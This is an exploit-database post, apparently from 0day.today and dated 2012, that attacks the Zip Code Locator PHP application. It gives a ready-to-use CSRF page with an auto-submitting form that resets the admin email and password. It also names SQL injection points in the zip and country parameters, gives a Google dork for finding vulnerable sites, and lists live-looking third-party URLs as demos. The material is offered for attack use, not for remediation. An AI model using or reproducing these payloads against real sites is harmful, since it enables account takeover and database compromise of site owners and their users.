[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Zip Code Locator - CSRF/SQLi Vulnerabilities

Author
DaOne
Risk
[
Security Risk Low
]
0day-ID
0day-ID-19593
Category
web applications
Date add
19-10-2012
Platform
php
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm DaOne member from Inj3ct0r Team                    1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##########################################
# Exploit Title: Zip Code Locator - CSRF/SQLi Vulnerabilities
# Date: 2012-10-19
# Author: DaOne aka Mocking Bird
# Home: 1337day Inj3ct0r Exploit Database 
# Software Link: http://www.lookuprunner.com
# Category: webapps/php
# Version: 1.3.1-> 1.3.13 
# Price: $149
# Google dork: O_o intext:"Zip Code Locator by Lookup Runner"
##########################################
[#] [CSRF Change Admin Password]:
<html>
<body onload="document.form.submit();">
<form action="http://[target]/index.php" method="post" name="form">
<input type="hidden" name="email" value="admin@email.com">
<input type="hidden" name="new_password" value="passw0rd">
<input type="hidden" name="new_password2" value="passw0rd">
<input type="hidden" name="panel" value="admin/profile">
<input type="hidden" name="action" value="update">
</form>
</body>
</html>

[#] [SQL Injection]:
http://[host]/index.php?zip=[Error Based Injection]
http://[host]/index.php?zip=60070&country=[Error Based Injection]
# Demo:
http://www.lookuprunner.com/demo/?zip=60070&within=25&country=1
http://www.galaxyfireworks.com/zip/?zip=60070&within=25&country=1
http://www.fixingyou.net/search/?zip=1
#
Thanks to: TheGreaTTeAm/LCA and Inj3ct0r Team.

#  0day.today [2024-09-20]  #